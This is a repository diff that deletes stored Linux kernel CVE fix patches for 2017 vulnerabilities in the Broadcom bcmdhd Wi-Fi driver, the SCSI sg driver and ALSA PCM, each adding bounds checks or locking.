@@ -1,173 +0,0 @@ -From 5575ff40a53a954ec942ff0c17b193433e72c132 Mon Sep 17 00:00:00 2001 -From: Sudhir Kohalli -Date: Wed, 14 Jun 2017 11:36:22 -0700 -Subject: net: wireless: bcmdhd: add boundary check in GSCAN full result - handler - -validtating each length fields before not to overflow allocated -data type. it prevent possiblity heap memory corrupted. - -Signed-off-by: Sudhir Kohalli -Bug: 37357704 -Change-Id: I7c04b93f3843c8100bd932fb9b7c67ef76b93050 ---- - drivers/net/wireless/bcmdhd/dhd_linux.c | 5 +++-- - drivers/net/wireless/bcmdhd/dhd_pno.c | 37 ++++++++++++++++++++++++------- - drivers/net/wireless/bcmdhd/dhd_pno.h | 7 +++--- - drivers/net/wireless/bcmdhd/wl_cfg80211.c | 7 ++++-- - 4 files changed, 41 insertions(+), 15 deletions(-) - -diff --git a/drivers/net/wireless/bcmdhd/dhd_linux.c b/drivers/net/wireless/bcmdhd/dhd_linux.c -index 0b66e91..abc4331 100644 ---- a/drivers/net/wireless/bcmdhd/dhd_linux.c -+++ b/drivers/net/wireless/bcmdhd/dhd_linux.c -@@ -8420,11 +8420,12 @@ void * dhd_dev_hotlist_scan_event(struct net_device *dev, - - /* Linux wrapper to call common dhd_process_full_gscan_result */ - void * dhd_dev_process_full_gscan_result(struct net_device *dev, --const void *data, int *send_evt_bytes) -+const void *data, uint32 len, int *send_evt_bytes) - { - dhd_info_t *dhd = *(dhd_info_t **)netdev_priv(dev); - -- return (dhd_process_full_gscan_result(&dhd->pub, data, send_evt_bytes)); -+ return dhd_process_full_gscan_result(&dhd->pub, data, len, -+ send_evt_bytes); - } - - void dhd_dev_gscan_hotlist_cache_cleanup(struct net_device *dev, hotlist_type_t type) -diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c -index c80adec..3103f89 100644 ---- a/drivers/net/wireless/bcmdhd/dhd_pno.c -+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c -@@ -47,6 +47,7 @@ - #ifdef GSCAN_SUPPORT - #include - #endif /* GSCAN_SUPPORT */ -+#include - - #ifdef __BIG_ENDIAN - #include -@@ -3693,7 +3694,8 @@ void 
dhd_gscan_hotlist_cache_cleanup(dhd_pub_t *dhd, hotlist_type_t type) - } - - void * --dhd_process_full_gscan_result(dhd_pub_t *dhd, const void *data, int *size) -+dhd_process_full_gscan_result(dhd_pub_t *dhd, const void *data, uint32 len, -+ int *size) - { - wl_bss_info_t *bi = NULL; - wl_gscan_result_t *gscan_result; -@@ -3702,15 +3704,25 @@ dhd_process_full_gscan_result(dhd_pub_t *dhd, const void *data, int *size) - uint8 channel; - uint32 mem_needed; - struct timespec ts; -+ u32 bi_ie_length = 0; -+ u32 bi_ie_offset = 0; - - *size = 0; -- - gscan_result = (wl_gscan_result_t *)data; -- - if (!gscan_result) { - DHD_ERROR(("Invalid gscan result (NULL pointer)\n")); - goto exit; - } -+ -+ if ((len < sizeof(*gscan_result)) || -+ (len < dtoh32(gscan_result->buflen)) || -+ (dtoh32(gscan_result->buflen) > -+ (sizeof(*gscan_result) + WL_SCAN_IE_LEN_MAX))) { -+ DHD_ERROR(("%s: invalid gscan buflen:%u\n", __func__, -+ dtoh32(gscan_result->buflen))); -+ goto exit; -+ } -+ - if (!gscan_result->bss_info) { - DHD_ERROR(("Invalid gscan bss info (NULL pointer)\n")); - goto exit; -@@ -3722,12 +3734,21 @@ dhd_process_full_gscan_result(dhd_pub_t *dhd, const void *data, int *size) - DHD_ERROR(("Invalid bss_info length %d: ignoring\n", bi_length)); - goto exit; - } -+ -+ bi_ie_offset = dtoh32(bi->ie_offset); -+ bi_ie_length = dtoh32(bi->ie_length); -+ if ((bi_ie_offset + bi_ie_length) > bi_length) { -+ DHD_ERROR(("%s: Invalid ie_length:%u or ie_offset:%u\n", -+ __func__, bi_ie_length, bi_ie_offset)); -+ goto exit; -+ } - if (bi->SSID_len > DOT11_MAX_SSID_LEN) { -- DHD_ERROR(("Invalid SSID length %d: trimming it to max\n", bi->SSID_len)); -- bi->SSID_len = DOT11_MAX_SSID_LEN; -+ DHD_ERROR(("%s: Invalid SSID length %u\n", -+ __func__, bi->SSID_len)); -+ goto exit; - } - -- mem_needed = OFFSETOF(wifi_gscan_full_result_t, ie_data) + bi->ie_length; -+ mem_needed = OFFSETOF(wifi_gscan_full_result_t, ie_data) + bi_ie_length; - result = (wifi_gscan_full_result_t *) kmalloc(mem_needed, 
GFP_KERNEL); - - if (!result) { -@@ -3749,9 +3770,9 @@ dhd_process_full_gscan_result(dhd_pub_t *dhd, const void *data, int *size) - result->fixed.ts = (uint64) TIMESPEC_TO_US(ts); - result->fixed.beacon_period = dtoh16(bi->beacon_period); - result->fixed.capability = dtoh16(bi->capability); -- result->ie_length = dtoh32(bi->ie_length); -+ result->ie_length = bi_ie_length; - memcpy(&result->fixed.macaddr, &bi->BSSID, ETHER_ADDR_LEN); -- memcpy(result->ie_data, ((uint8 *)bi + bi->ie_offset), bi->ie_length); -+ memcpy(result->ie_data, ((uint8 *)bi + bi_ie_offset), bi_ie_length); - *size = mem_needed; - exit: - return result; -diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.h b/drivers/net/wireless/bcmdhd/dhd_pno.h -index a0edf54..3398752 100644 ---- a/drivers/net/wireless/bcmdhd/dhd_pno.h -+++ b/drivers/net/wireless/bcmdhd/dhd_pno.h -@@ -512,7 +512,7 @@ int dhd_retreive_batch_scan_results(dhd_pub_t *dhd); - extern void * dhd_dev_hotlist_scan_event(struct net_device *dev, - const void *data, int *send_evt_bytes, hotlist_type_t type); - void * dhd_dev_process_full_gscan_result(struct net_device *dev, -- const void *data, int *send_evt_bytes); -+ const void *data, uint32 len, int *send_evt_bytes); - extern int dhd_dev_gscan_batch_cache_cleanup(struct net_device *dev); - extern void dhd_dev_gscan_hotlist_cache_cleanup(struct net_device *dev, hotlist_type_t type); - extern int dhd_dev_wait_batch_results_complete(struct net_device *dev); -@@ -563,8 +563,9 @@ extern int dhd_dev_retrieve_batch_scan(struct net_device *dev); - extern void *dhd_handle_swc_evt(dhd_pub_t *dhd, const void *event_data, int *send_evt_bytes); - extern void *dhd_handle_hotlist_scan_evt(dhd_pub_t *dhd, const void *event_data, - int *send_evt_bytes, hotlist_type_t type); --extern void *dhd_process_full_gscan_result(dhd_pub_t *dhd, const void *event_data, -- int *send_evt_bytes); -+extern void * -+dhd_process_full_gscan_result(dhd_pub_t *dhd, const void *event_data, -+ uint32 len, int *send_evt_bytes); - 
extern int dhd_gscan_batch_cache_cleanup(dhd_pub_t *dhd); - extern void dhd_gscan_hotlist_cache_cleanup(dhd_pub_t *dhd, hotlist_type_t type); - extern int dhd_wait_batch_results_complete(dhd_pub_t *dhd); -diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c -index d8c748d..1d1e2a8 100644 ---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c -+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c -@@ -9452,10 +9452,13 @@ wl_notify_gscan_event(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev, - err = -EINVAL; - break; - case WLC_E_PFN_GSCAN_FULL_RESULT: -- ptr = dhd_dev_process_full_gscan_result(ndev, data, &send_evt_bytes); -+ ptr = -+ dhd_dev_process_full_gscan_result(ndev, data, len, -+ &send_evt_bytes); - if (ptr) { - wl_cfgvendor_send_async_event(wiphy, ndev, -- GOOGLE_SCAN_FULL_RESULTS_EVENT, ptr, send_evt_bytes); -+ GOOGLE_SCAN_FULL_RESULTS_EVENT, ptr, -+ send_evt_bytes); - kfree(ptr); - } else - err = -ENOMEM; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0791/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0791/ANY/0001.patch deleted file mode 100644 index 437310a9..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0791/ANY/0001.patch +++ /dev/null 
@@ -1,53 +0,0 @@
-From 2935fde98001eca0f8dafad827933ce60d44ffba Mon Sep 17 00:00:00 2001
-From: Insun Song
-Date: Wed, 24 May 2017 09:21:02 -0700
-Subject: net: wireless: bcmdhd: adding boundary check in
- wl_notify_rx_mgmt_frame
-
-added boundary check for input parameters not to corrupt kernel heap in
-case user injected malformed input
-
-Signed-off-by: Insun Song
-Bug: 37306719
-Change-Id: I6dc12e9bcfce8f3b43ecf14bfd6976bf87afeaa5
----
- drivers/net/wireless/bcmdhd/wl_cfg80211.c | 14 ++++++++++++--
- 1 file changed, 12 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-index 842091f..021f69f7 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-@@ -9657,9 +9657,15 @@ wl_notify_rx_mgmt_frame(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev,
- u32 event = ntoh32(e->event_type);
- u8 *mgmt_frame;
- u8 bsscfgidx = e->bsscfgidx;
-- u32 mgmt_frame_len = ntoh32(e->datalen) - sizeof(wl_event_rx_frame_data_t);
-+ u32 mgmt_frame_len = ntoh32(e->datalen);
- u16 channel = ((ntoh16(rxframe->channel) & WL_CHANSPEC_CHAN_MASK));
-
-+ if (mgmt_frame_len < sizeof(wl_event_rx_frame_data_t)) {
-+ WL_ERR(("wrong datalen:%d\n", mgmt_frame_len));
-+ return -EINVAL;
-+ }
-+ mgmt_frame_len -= sizeof(wl_event_rx_frame_data_t);
-+
- memset(&bssid, 0, ETHER_ADDR_LEN);
-
- ndev = cfgdev_to_wlc_ndev(cfgdev, cfg);
-@@ -9781,7 +9787,11 @@ wl_notify_rx_mgmt_frame(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev,
- WL_DBG((" Event WLC_E_PROBREQ_MSG received\n"));
- mgmt_frame = (u8 *)(data);
- mgmt_frame_len = ntoh32(e->datalen);
--
-+ if (mgmt_frame_len < DOT11_MGMT_HDR_LEN) {
-+ WL_ERR(("WLC_E_PROBREQ_MSG - wrong datalen:%d\n",
-+ mgmt_frame_len));
-+ return -EINVAL;
-+ }
- prbreq_ie_len = mgmt_frame_len - DOT11_MGMT_HDR_LEN;
-
- /* Parse prob_req IEs */
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0792/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0792/ANY/0001.patch
deleted file mode 100644
index 839c4b1d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0792/ANY/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From f35ce58f516c15c022745d687bb1c59ffab63293 Mon Sep 17 00:00:00 2001
-From: Insun Song
-Date: Wed, 24 May 2017 10:11:27 -0700
-Subject: net: wireless: bcmdhd: add boundary check in dhd_rtt_event_handler
-
-added boundary check for input parameters not to corrupt kernel heap in
-case user injected malformed input
-
-Signed-off-by: Insun Song
-Bug: 37305578
-Change-Id: I92114d7166fb68d8d97b33ea214f80e8917794d1
----
- drivers/net/wireless/bcmdhd/dhd_rtt.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_rtt.c b/drivers/net/wireless/bcmdhd/dhd_rtt.c
-index 371328a..34b05be 100644
---- a/drivers/net/wireless/bcmdhd/dhd_rtt.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_rtt.c
-@@ -1696,6 +1696,10 @@ dhd_rtt_event_handler(dhd_pub_t *dhd, wl_event_msg_t *event, void *event_data)
- return ret;
- }
- }
-+ if (!event_data) {
-+ DHD_ERROR(("%s: event_data:NULL\n", __FUNCTION__));
-+ return -EINVAL;
-+ }
- p_event = (wl_proxd_event_t *) event_data;
- version = ltoh16(p_event->version);
- if (version < WL_PROXD_API_VERSION) {
-@@ -1718,6 +1722,11 @@ dhd_rtt_event_handler(dhd_pub_t *dhd, wl_event_msg_t *event, void *event_data)
- goto exit; /* ignore this event */
- }
- /* get TLVs len, skip over event header */
-+ if (ltoh16(p_event->len) < OFFSETOF(wl_proxd_event_t, tlvs)) {
-+ DHD_ERROR(("invalid FTM event length:%d\n", ltoh16(p_event->len)));
-+ ret = -EINVAL;
-+ goto exit;
-+ }
- tlvs_len = ltoh16(p_event->len) - OFFSETOF(wl_proxd_event_t, tlvs);
- DHD_RTT(("receive '%s' event: version=0x%x len=%d method=%d sid=%d tlvs_len=%d\n",
- p_loginfo->text,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0794/ANY/0001.patch.disabled b/Patches/Linux_CVEs/CVE-2017-0794/ANY/0001.patch.disabled
deleted file mode 100644
index 2857497f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0794/ANY/0001.patch.disabled
+++ /dev/null
@@ -1,164 +0,0 @@ -From 47b3a105cc4cec0d912345d27d9743b97691b21c Mon Sep 17 00:00:00 2001 -From: Robb Glasser -Date: Fri, 24 Mar 2017 16:23:37 -0700 -Subject: [PATCH] Prevent potential double frees in sg driver - -sg_ioctl could be spammed by requests, leading to a double free in -__free_pages. This protects the entry points of sg_ioctl where the -memory could be corrupted by a double call to __free_pages if multiple -requests are happening concurrently. - -Bug:35644812 - -Change-Id: Ie13f65beb6974430f90292e2742841b26aecb8b1 -Signed-off-by: Robb Glasser ---- - drivers/scsi/sg.c | 34 ++++++++++++++++++++-------------- - 1 file changed, 20 insertions(+), 14 deletions(-) - -diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c -index 721d839d6c543..9a600f05ab57a 100644 ---- a/drivers/scsi/sg.c -+++ b/drivers/scsi/sg.c -@@ -486,7 +486,7 @@ sg_read(struct file *filp, char __user *buf, size_t count, loff_t * ppos) - old_hdr->result = EIO; - break; - case DID_ERROR: -- old_hdr->result = (srp->sense_b[0] == 0 && -+ old_hdr->result = (srp->sense_b[0] == 0 && - hp->masked_status == GOOD) ? 
0 : EIO; - break; - default: -@@ -832,8 +832,10 @@ sg_ioctl(struct file *filp, unsigned int cmd_in, unsigned long arg) - return -ENXIO; - if (!access_ok(VERIFY_WRITE, p, SZ_SG_IO_HDR)) - return -EFAULT; -+ mutex_lock(&sfp->parentdp->open_rel_lock); - result = sg_new_write(sfp, filp, p, SZ_SG_IO_HDR, - 1, read_only, 1, &srp); -+ mutex_unlock(&sfp->parentdp->open_rel_lock); - if (result < 0) - return result; - result = wait_event_interruptible(sfp->read_wait, -@@ -873,8 +875,10 @@ sg_ioctl(struct file *filp, unsigned int cmd_in, unsigned long arg) - sfp->low_dma = 1; - if ((0 == sfp->low_dma) && (0 == sg_res_in_use(sfp))) { - val = (int) sfp->reserve.bufflen; -+ mutex_lock(&sfp->parentdp->open_rel_lock); - sg_remove_scat(&sfp->reserve); - sg_build_reserve(sfp, val); -+ mutex_unlock(&sfp->parentdp->open_rel_lock); - } - } else { - if (sdp->detached) -@@ -942,15 +946,17 @@ sg_ioctl(struct file *filp, unsigned int cmd_in, unsigned long arg) - result = get_user(val, ip); - if (result) - return result; -- if (val < 0) -- return -EINVAL; -+ if (val < 0) -+ return -EINVAL; - val = min_t(int, val, - queue_max_sectors(sdp->device->request_queue) * 512); - if (val != sfp->reserve.bufflen) { - if (sg_res_in_use(sfp) || sfp->mmap_called) - return -EBUSY; -+ mutex_lock(&sfp->parentdp->open_rel_lock); - sg_remove_scat(&sfp->reserve); - sg_build_reserve(sfp, val); -+ mutex_unlock(&sfp->parentdp->open_rel_lock); - } - return 0; - case SG_GET_RESERVED_SIZE: -@@ -1003,8 +1009,8 @@ sg_ioctl(struct file *filp, unsigned int cmd_in, unsigned long arg) - if (srp) { - rinfo[val].req_state = srp->done + 1; - rinfo[val].problem = -- srp->header.masked_status & -- srp->header.host_status & -+ srp->header.masked_status & -+ srp->header.host_status & - srp->header.driver_status; - if (srp->done) - rinfo[val].duration = -@@ -1025,7 +1031,7 @@ sg_ioctl(struct file *filp, unsigned int cmd_in, unsigned long arg) - } - } - read_unlock_irqrestore(&sfp->rq_list_lock, iflags); -- result = 
__copy_to_user(p, rinfo, -+ result = __copy_to_user(p, rinfo, - SZ_SG_REQ_INFO * SG_MAX_QUEUE); - result = result ? -EFAULT : 0; - kfree(rinfo); -@@ -1127,14 +1133,14 @@ static long sg_compat_ioctl(struct file *filp, unsigned int cmd_in, unsigned lon - return -ENXIO; - - sdev = sdp->device; -- if (sdev->host->hostt->compat_ioctl) { -+ if (sdev->host->hostt->compat_ioctl) { - int ret; - - ret = sdev->host->hostt->compat_ioctl(sdev, cmd_in, (void __user *)arg); - - return ret; - } -- -+ - return -ENOIOCTLCMD; - } - #endif -@@ -1594,7 +1600,7 @@ init_sg(void) - else - def_reserved_size = sg_big_buff; - -- rc = register_chrdev_region(MKDEV(SCSI_GENERIC_MAJOR, 0), -+ rc = register_chrdev_region(MKDEV(SCSI_GENERIC_MAJOR, 0), - SG_MAX_DEVS, "sg"); - if (rc) - return rc; -@@ -2234,7 +2240,7 @@ static const struct file_operations adio_fops = { - }; - - static int sg_proc_single_open_dressz(struct inode *inode, struct file *file); --static ssize_t sg_proc_write_dressz(struct file *filp, -+static ssize_t sg_proc_write_dressz(struct file *filp, - const char __user *buffer, size_t count, loff_t *off); - static const struct file_operations dressz_fops = { - .owner = THIS_MODULE, -@@ -2374,7 +2380,7 @@ static int sg_proc_single_open_adio(struct inode *inode, struct file *file) - return single_open(file, sg_proc_seq_show_int, &sg_allow_dio); - } - --static ssize_t -+static ssize_t - sg_proc_write_adio(struct file *filp, const char __user *buffer, - size_t count, loff_t *off) - { -@@ -2395,7 +2401,7 @@ static int sg_proc_single_open_dressz(struct inode *inode, struct file *file) - return single_open(file, sg_proc_seq_show_int, &sg_big_buff); - } - --static ssize_t -+static ssize_t - sg_proc_write_dressz(struct file *filp, const char __user *buffer, - size_t count, loff_t *off) - { -@@ -2552,7 +2558,7 @@ static void sg_proc_debug_helper(struct seq_file *s, Sg_device * sdp) - hp = &srp->header; - new_interface = (hp->interface_id == '\0') ? 
0 : 1; - if (srp->res_used) { -- if (new_interface && -+ if (new_interface && - (SG_FLAG_MMAP_IO & hp->flags)) - cp = " mmap>> "; - else -@@ -2566,7 +2572,7 @@ static void sg_proc_debug_helper(struct seq_file *s, Sg_device * sdp) - seq_printf(s, cp); - blen = srp->data.bufflen; - usg = srp->data.k_use_sg; -- seq_printf(s, srp->done ? -+ seq_printf(s, srp->done ? - ((1 == srp->done) ? "rcv:" : "fin:") - : "act:"); - seq_printf(s, " id=%d blen=%d", diff --git a/Patches/Linux_CVEs/CVE-2017-0824/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0824/ANY/0001.patch deleted file mode 100644 index 02283a8b..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0824/ANY/0001.patch +++ /dev/null 
@@ -1,105 +0,0 @@ -From 3d6c7b39db34369e28b0581be26f57e9467f8408 Mon Sep 17 00:00:00 2001 -From: Insun Song -Date: Fri, 7 Jul 2017 14:53:03 -0700 -Subject: net: wireless: bcmdhd: remove SDIO debug IOVARs causing out of bounds - -"sd_devreg" IOVAR can cause out of bounds access when user input -manipulated. Proposed fix is removing debug oriented IOVARs completely. - -Signed-off-by: Insun Song -Bug: 37622847 -Change-Id: I8fc5111fe9d8d2c5d7ae5b1c24ae8e531113beae ---- - drivers/net/wireless/bcmdhd/bcmsdh_sdmmc.c | 69 ------------------------------ - 1 file changed, 69 deletions(-) - -diff --git a/drivers/net/wireless/bcmdhd/bcmsdh_sdmmc.c b/drivers/net/wireless/bcmdhd/bcmsdh_sdmmc.c -index 427298f..a440998 100644 ---- a/drivers/net/wireless/bcmdhd/bcmsdh_sdmmc.c -+++ b/drivers/net/wireless/bcmdhd/bcmsdh_sdmmc.c -@@ -406,8 +406,6 @@ const bcm_iovar_t sdioh_iovars[] = { - {"sd_ints", IOV_USEINTS, 0, IOVT_BOOL, 0 }, - {"sd_numints", IOV_NUMINTS, 0, IOVT_UINT32, 0 }, - {"sd_numlocalints", IOV_NUMLOCALINTS, 0, IOVT_UINT32, 0 }, -- {"sd_hostreg", IOV_HOSTREG, 0, IOVT_BUFFER, sizeof(sdreg_t) }, -- {"sd_devreg", IOV_DEVREG, 0, IOVT_BUFFER, sizeof(sdreg_t) }, - {"sd_divisor", IOV_DIVISOR, 0, IOVT_UINT32, 0 }, - {"sd_power", IOV_POWER, 0, IOVT_UINT32, 0 }, - {"sd_clock", IOV_CLOCK, 0, IOVT_UINT32, 0 }, -@@ -608,73 +606,6 @@ sdioh_iovar_op(sdioh_info_t *si, const char *name, - bcopy(&int_val, arg, sizeof(int_val)); - break; - -- case IOV_GVAL(IOV_HOSTREG): -- { -- sdreg_t *sd_ptr = (sdreg_t *)params; -- -- if (sd_ptr->offset < SD_SysAddr || sd_ptr->offset > SD_MaxCurCap) { -- sd_err(("%s: bad offset 0x%x\n", __FUNCTION__, sd_ptr->offset)); -- bcmerror = BCME_BADARG; -- break; -- } -- -- sd_trace(("%s: rreg%d at offset %d\n", __FUNCTION__, -- (sd_ptr->offset & 1) ? 8 : ((sd_ptr->offset & 2) ? 
16 : 32), -- sd_ptr->offset)); -- if (sd_ptr->offset & 1) -- int_val = 8; /* sdioh_sdmmc_rreg8(si, sd_ptr->offset); */ -- else if (sd_ptr->offset & 2) -- int_val = 16; /* sdioh_sdmmc_rreg16(si, sd_ptr->offset); */ -- else -- int_val = 32; /* sdioh_sdmmc_rreg(si, sd_ptr->offset); */ -- -- bcopy(&int_val, arg, sizeof(int_val)); -- break; -- } -- -- case IOV_SVAL(IOV_HOSTREG): -- { -- sdreg_t *sd_ptr = (sdreg_t *)params; -- -- if (sd_ptr->offset < SD_SysAddr || sd_ptr->offset > SD_MaxCurCap) { -- sd_err(("%s: bad offset 0x%x\n", __FUNCTION__, sd_ptr->offset)); -- bcmerror = BCME_BADARG; -- break; -- } -- -- sd_trace(("%s: wreg%d value 0x%08x at offset %d\n", __FUNCTION__, sd_ptr->value, -- (sd_ptr->offset & 1) ? 8 : ((sd_ptr->offset & 2) ? 16 : 32), -- sd_ptr->offset)); -- break; -- } -- -- case IOV_GVAL(IOV_DEVREG): -- { -- sdreg_t *sd_ptr = (sdreg_t *)params; -- uint8 data = 0; -- -- if (sdioh_cfg_read(si, sd_ptr->func, sd_ptr->offset, &data)) { -- bcmerror = BCME_SDIO_ERROR; -- break; -- } -- -- int_val = (int)data; -- bcopy(&int_val, arg, sizeof(int_val)); -- break; -- } -- -- case IOV_SVAL(IOV_DEVREG): -- { -- sdreg_t *sd_ptr = (sdreg_t *)params; -- uint8 data = (uint8)sd_ptr->value; -- -- if (sdioh_cfg_write(si, sd_ptr->func, sd_ptr->offset, &data)) { -- bcmerror = BCME_SDIO_ERROR; -- break; -- } -- break; -- } -- - default: - bcmerror = BCME_UNSUPPORTED; - break; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0825/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0825/ANY/0001.patch deleted file mode 100644 index c058b66f..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0825/ANY/0001.patch +++ /dev/null 
@@ -1,129 +0,0 @@ -From 83366dd9ddb9337450f704ceef750a06c69df9ff Mon Sep 17 00:00:00 2001 -From: Franky Lin -Date: Wed, 5 Jul 2017 18:04:55 -0700 -Subject: [PATCH] net: wireless: bcmdhd: add log trace event length check - -In log trace event parsing routine, add appropriate length check before -accessing event data to prevent out of boundary memory access - -Bug: 37305633 -Signed-off-by: Franky Lin -Change-Id: I267369957f9b8788f254d9433eb7787b75fb04bc ---- - drivers/net/wireless/bcmdhd/dhd_debug.c | 52 +++++++++++++++++-------- - drivers/net/wireless/bcmdhd/include/event_log.h | 1 + - 2 files changed, 37 insertions(+), 16 deletions(-) - -diff --git a/drivers/net/wireless/bcmdhd/dhd_debug.c b/drivers/net/wireless/bcmdhd/dhd_debug.c -index 3c45ced1ddc4f..70f4e2df3b752 100644 ---- a/drivers/net/wireless/bcmdhd/dhd_debug.c -+++ b/drivers/net/wireless/bcmdhd/dhd_debug.c -@@ -394,6 +394,12 @@ dhd_dbg_custom_evnt_handler(dhd_pub_t *dhdp, event_log_hdr_t *hdr, uint32 *data) - wl_log_id.t = *data; - if (wl_log_id.version != DIAG_VERSION) return BCME_VERSION; - -+ /* custom event log should at least contain a wl_event_log_id_ver_t -+ * header and an arm cycle count -+ */ -+ if (hdr->count < 2) -+ return BCME_BADLEN; -+ - ts_hdr = (void *)data - sizeof(event_log_hdr_t); - if (ts_hdr->tag == EVENT_LOG_TAG_TS) { - ts_data = (uint32 *)ts_hdr - ts_hdr->count; -@@ -624,7 +630,8 @@ dhd_dbg_msgtrace_log_parser(dhd_pub_t *dhdp, void *event_data, - msgtrace_hdr_t *hdr; - char *data; - int id; -- uint32 hdrlen = sizeof(event_log_hdr_t); -+ const uint32 log_hdr_len = sizeof(event_log_hdr_t); -+ uint32 log_pyld_len; - static uint32 seqnum_prev = 0; - event_log_hdr_t *log_hdr; - bool event_type = FALSE; -@@ -632,6 +639,13 @@ dhd_dbg_msgtrace_log_parser(dhd_pub_t *dhdp, void *event_data, - dll_t list_head, *cur; - loglist_item_t *log_item; - -+ /* log trace event consists of -+ * msgtrace header -+ * event log block header -+ * event log payload -+ */ -+ if (datalen <= MSGTRACE_HDRLEN + 
EVENT_LOG_BLOCK_HDRLEN) -+ return; - hdr = (msgtrace_hdr_t *)event_data; - data = (char *)event_data + MSGTRACE_HDRLEN; - datalen -= MSGTRACE_HDRLEN; -@@ -640,30 +654,36 @@ dhd_dbg_msgtrace_log_parser(dhd_pub_t *dhdp, void *event_data, - return; - - /* XXX: skip the meaningless pktlen/count and timestamp */ -- data += 8; -- datalen -= 8; -+ data += EVENT_LOG_BLOCK_HDRLEN; -+ datalen -= EVENT_LOG_BLOCK_HDRLEN; - - /* start from the end and walk through the packet */ - dll_init(&list_head); -- while (datalen > 0) { -- log_hdr = (event_log_hdr_t *)(data + datalen - hdrlen); -- /* pratially overwritten entries */ -- if ((uint32 *)log_hdr - (uint32 *)data < log_hdr->count) -- break; -- /* end of frame? */ -+ while (datalen > log_hdr_len) { -+ log_hdr = (event_log_hdr_t *)(data + datalen - log_hdr_len); -+ /* skip zero padding at end of frame */ - if (log_hdr->tag == EVENT_LOG_TAG_NULL) { -- log_hdr--; -- datalen -= hdrlen; -+ datalen -= log_hdr_len; - continue; - } -+ -+ /* Check argument count, any event log should contain at least -+ * one argument (4 bytes) for arm cycle count and up to 16 -+ * arguments -+ */ -+ if ((log_hdr->count == 0) || (log_hdr->count > MAX_NO_OF_ARG)) -+ break; -+ -+ log_pyld_len = log_hdr->count * DATA_UNIT_FOR_LOG_CNT; -+ /* log data should not cross event data boundary */ -+ if (((char *)log_hdr - data) < log_pyld_len) -+ break; -+ - /* skip 4 bytes time stamp packet */ - if (log_hdr->tag == EVENT_LOG_TAG_TS) { -- datalen -= log_hdr->count * 4 + hdrlen; -- log_hdr -= log_hdr->count + hdrlen / 4; -+ datalen -= log_pyld_len + log_hdr_len; - continue; - } -- if (log_hdr->count > MAX_NO_OF_ARG) -- break; - if (!(log_item = MALLOC(dhdp->osh, sizeof(*log_item)))) { - DHD_ERROR(("%s allocating log list item failed\n", - __FUNCTION__)); -@@ -671,7 +691,7 @@ dhd_dbg_msgtrace_log_parser(dhd_pub_t *dhdp, void *event_data, - } - log_item->hdr = log_hdr; - dll_insert(&log_item->list, &list_head); -- datalen -= (log_hdr->count * 4 + hdrlen); -+ datalen 
-= (log_pyld_len + log_hdr_len); - } - - while (!dll_empty(&list_head)) { -diff --git a/drivers/net/wireless/bcmdhd/include/event_log.h b/drivers/net/wireless/bcmdhd/include/event_log.h -index 6f0bbc4e40ec1..3964d203d2fb9 100644 ---- a/drivers/net/wireless/bcmdhd/include/event_log.h -+++ b/drivers/net/wireless/bcmdhd/include/event_log.h -@@ -141,6 +141,7 @@ - #define LOGSTRS_MAGIC 0x4C4F4753 - #define LOGSTRS_VERSION 0x1 - -+#define EVENT_LOG_BLOCK_HDRLEN 8 - - /* - * There are multiple levels of objects define here: diff --git a/Patches/Linux_CVEs/CVE-2017-0861/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0861/3.10/0001.patch deleted file mode 100644 index 7d72b4b9..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0861/3.10/0001.patch +++ /dev/null @@ -1,32 +0,0 @@ -From 93533f313a1bf465ff8c33032e91b88315dcf9bf Mon Sep 17 00:00:00 2001 -From: Robb Glasser -Date: Fri, 11 Aug 2017 11:33:31 -0700 -Subject: [PATCH] ALSA: pcm: prevent UAF in snd_pcm_info - -When the device descriptor is closed, the `substream->runtime` pointer -is freed. But another thread may be in the ioctl handler, case -SNDRV_CTL_IOCTL_PCM_INFO. This case calls snd_pcm_info_user() which -calls snd_pcm_info() which accesses the now freed `substream->runtime`. - -Bug: 36006981 -Signed-off-by: Robb Glasser -Signed-off-by: Nick Desaulniers -Change-Id: I445d24bc21dc0af6d9522a8daabe64969042236a ---- - sound/core/pcm.c | 2 ++ - 1 file changed, 2 insertions(+) - -diff --git a/sound/core/pcm.c b/sound/core/pcm.c -index 0ad1231c15372..6548b3af383fa 100644 ---- a/sound/core/pcm.c -+++ b/sound/core/pcm.c -@@ -150,7 +150,9 @@ static int snd_pcm_control_ioctl(struct snd_card *card, - err = -ENXIO; - goto _error; - } -+ mutex_lock(&pcm->open_mutex); - err = snd_pcm_info_user(substream, info); -+ mutex_unlock(&pcm->open_mutex); - _error: - mutex_unlock(®ister_mutex); - return err; 
